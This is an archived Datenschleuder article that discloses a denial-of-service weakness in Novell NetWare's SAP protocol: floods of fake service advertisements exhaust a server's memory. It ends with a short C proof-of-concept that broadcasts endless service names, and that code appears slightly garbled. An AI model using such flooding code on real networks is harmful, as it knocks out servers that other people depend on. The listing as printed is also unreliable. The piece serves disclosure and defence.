[Chaos CD]
[Datenschleuder] [48]    The SAP Trouble A Message To Novell
[Gescannte Version] [ -- ] [ ++ ] [Suchen]  

 

The SAP Trouble
A Message To Novell

What is Novell's SAP? SAP stands for Server Advertise Protocol. If you have a server program (perhaps a database like BTRIEVE) you may want client to automatically find this service on your network. A protocol that helps you is the SAP protocol from Novell. It acts as follows:

Every service on the network broadcasts once the minute an IPX packet on the network that has a specific IPX socket number. The socket number is 0x0452. The packet data provides information as follows:

  • node ID (Ethernet address)
  • network number (IPX network)
  • network hops
  • name-of-service (48 char unique)
  • type-of-service (2 Bytes unique, numbers from 0x0-0x8000 are owned by Novell the others are for other companys, you can apply a number from Novell for your own service at no cost)

Every Novell server catches these information. These information is written out to the Bindery and stored into server memory because it's routing information and that must be fast to get. The information is deleted after a period of 3 minutes if there is no new broadcast of the same packet. If a client wants to have a service he sends a request packet to the next server and the server replys the information under which address the service exists.

Now would you say:"What is this guy telling us? We already know this! It is well-proven and running. There is no disgrace!"

You are not right, there is a disgrace! A big one that can crash down your server.

What do you think would happen if you have a program that broadcasts its service announcement packet not once the minute, but continuously as fast as it is possible? Not much. But what would happen if this program always produces new service names or service IDs with every new packet? The server stores all these new services into its Bindery. It will need more and more memory for storing the services because this is routing info and routing must be fast. The server will allocate more and more memory from the cache buffers since there is no more main memory.

After some time the server has spend ALL of his available memory to store the SAP-info. From this point on you can't login because the login command needs memory and there is no more memory available. You have no longer access to files because this needs memory. You can't look on the packet traffic using the monitor.nlm because this window needs memory. You can't open the router tracking window (say "TRACK ON") to see what's happening because there is no memory.

The SAP-broadcast consumes ALL of the server's memory.

Nothing else as storing AND FORWARDING of SAP-Packets will happen on the server. You can no longer login or query files!

Your server perhaps will crash down if you have loaded NLMs that must have some memory in order to work fine.

If you stop the broadcasts your server will wipeout the SAP infos after 3 minutes because they won't be refreshed. Now you will get memory to work as before. On a 3.X server the memory taken from the disc cache won't be given back. It is unused server memory. You will have to shut down and reboot if you don't want a slow Server. On a 4.X Server the memory will be given back to the disk cache (they have a better memory policy).

You might say that you never will start a NLM containing a database or do that does this. But who said that only servers could produce SAP-Packets?

Every workstation could advertise a service that is stored by the Server because that is its business. Services could reside on workstations too. You can advertise a service and the NetWare server stores it.

So every Workstation on the Net can produce the SAP overflows. You only need the IPX protocol stack being loaded (as playing DOOM on the Net) and a small program as shown below and you can produce a lot of trouble to your supervisor. Imagine what happens on great networks in companys or universities!

Every SAP Packet that is stored by the server will be broadcasted by this server to all other servers to estabish the new service. The whole network will be infected.

This would not happen if you have a SAP filter NLM. But Novell only sells this NLM with his Multi-Protocol-Router. As I know it works only as filter to the WAN-Side, Every SAP packet will be stored on the server as before but probably is not forwarded to the WAN links.

The only chance I see is to have universal packet filters in source that links between the network adapter and perhaps the LSL to filter those packets. You must have this as source to make NLMs that specifically meets your needs, because you must write a new one for every form of SAP or RIP abuse.

I have reported this problem to Novell. But they only say: "Well this might be a problem. The only way is to prevent the users to start a program that produces SAP broadcasts". Well, nice try! But this is not a solution!!! Every user who doesn't like me or want to see me work can stan such a program and ruin my servers.

THE SOLUTION MUST BE PROVIDED BY NOVELL AND IT MUST COME FAAAAAASSSST!!!!

If you don't believe me try out the little program printed below. I've found a program like below in a little BBS were everyone could download it. After I've found out what it does I had to publish it, I've chosen this way to publish the problem because I haven't received ANY reaction from Novell that REALLY helped me. p> If you are a USER PLEASE tell your SUPERVISOR about this. Tell him that he has to have a filter NLM loaded. Tell him to talk to Novell for applying one. Novell has to upload one in source in this area so everyone could modify it to meet his needs as filtering out packets so that only 1000 Packets per minutes are given to the server or specific workstations that are not secure are filtered out and so on....

If you have the Client SDK a program that produces this overflow may look like this:

 
#include  
#include  
#define NWWIN 
 
main{} 
{ 
  char string[20]; 
  int i; 
  long 1; 
  i=l=OL; 
  do { 
    sprintf(string,"SLOW%081X", 1); 
    AdvertiseService(0x2342,string, &i); 
    l++;

} while (42); }

Don't blame me for publishing this. Blame Novell for not doing ANYTHING against this.

 

  [Chaos CD]
[Datenschleuder] [48]    The SAP Trouble A Message To Novell
[Gescannte Version] [ -- ] [ ++ ] [Suchen]